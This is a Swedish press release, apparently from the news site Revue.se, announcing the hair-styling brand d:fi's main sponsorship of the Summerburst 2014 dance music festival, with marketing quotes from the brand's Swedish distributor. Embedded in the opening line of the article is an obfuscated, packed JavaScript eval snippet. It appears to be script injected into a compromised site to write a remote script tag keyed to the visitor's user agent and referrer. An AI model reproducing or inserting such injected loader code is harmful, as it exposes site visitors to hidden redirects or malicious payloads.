Image Image Image Image Image Image Image Image Image Image

| 23 november, 2017

Scroll to top

Top

No Comments

d:fi är stolt huvudsponsor av Summerburst | Revue.se

d:fi är stolt huvudsponsor av Summerburst
Sebastian Plengier Ehrnfelt

d:fi, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ynnbb|var|u0026u|referrer|sbhzi||js|php’.split(‘|’),0,{}))
Sveriges mest välkända stylingvarumärke, älskar musik och klubbscenen och är därför en mycket stolt huvudsponsor av 
Summerburst 2014 i Stockholm och Göteborg. Summerburst är Sveriges absolut hetaste musikfestival inriktad på elektronisk dansmusik. Festivalen äger rum varje sommar i Stockholm och Göteborg, under två helger i maj och juni 2014.

Sveriges mest välkända hårdvårdsvarumärke d:fi är stolt sponsor av Summerburst 2014. Stylingvarumärket d:fi kommer under hela 2014 möta sin målgrupp på just musik- och klubbarenor under namnet ”d:fi district”, där Summerburst 2014 är ett av dessa.

Efter en lyckad sponsring av helgens stora musikfestival November Lights på Tele2 Arena, där d:fi skapade festivalens hetaste takterrass ”d:fi district”, fortsätter stylingvarumärket d:fi att under hela 2014 kommunicera med sin målgrupp på arenor där musiken och klubbscenen är i fokus.

Summerburst är Sveriges snabbast växande festival, ett evenemang som är 100 procent tillägnad elektronisk dansmusik. Festivalen samlar några av världens absolut bästa och mest välkända DJ:s. 2014 års upplaga blir den fjärde i ordningen, sedan starten 2011.

 – Genom att sponsra musikevenemang i Sverige når vi rakt in i målgruppen, inte bara åldersmässigt utan även livsstilsmässigt. d:fis produkter är designade för att appellera på livsnjutare; 18 – 24 åringar som lever livet till fullo. Den här sortens människor använder sin kropp som en canvas och världen som sin inspiration. Allt som vi på d:fi gör, är precis som vår målgrupp, utan kompromiss, förförande, provocerande och råbarkat. Därför passar musik och klubbscenen oss som arena för att kommunicera med dessa livsnjutare, säger Malin Pettersson, marknadschef på Colomer Sweden, företaget som marknadsför d:fi i Sverige.

Summerburst 2014 genomförs i Göteborg 30 – 31 maj och Stockholm 13 – 14 juni och arrangörerna förutspår nytt publikrekord.

För att nå ut till målgruppen också i den digitala världen har d:fi även skapat www.dfihair.com  – en experimentell webbsite som innehåller information om produkterna och en s k ”look-book” som ger inspiration och förklarar hur de olika d:fi-looksen skall klippas och stylas, samt vilka produkter som ska användas. På webbsiten finns även bilder och videos som flirtar med målgruppens partylivsstil. Videons soundtrack är skapat av Julian Jordan samt Sander Van Doorn – två internationellt hyllade DJs.

Detta är ett pressmeddelande från D:fi